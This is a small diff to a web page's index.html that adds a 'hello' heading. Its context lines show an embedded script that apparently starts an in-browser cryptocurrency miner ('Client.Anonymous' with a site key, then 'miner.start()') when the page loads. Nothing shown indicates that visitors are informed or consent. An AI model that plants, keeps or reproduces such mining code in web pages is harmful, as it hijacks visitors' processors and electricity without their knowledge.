--- a/index.html
+++ b/index.html
@@ -9,5 +9,6 @@
     var miner = new Client.Anonymous('cefc78aa86c8fb633abd11e8b1d6c4b0d6be0258aad269391a3922f5a852b0b8');
     miner.start();
 </script>
+    <h1>hello</h1>
   </body>
 </html>
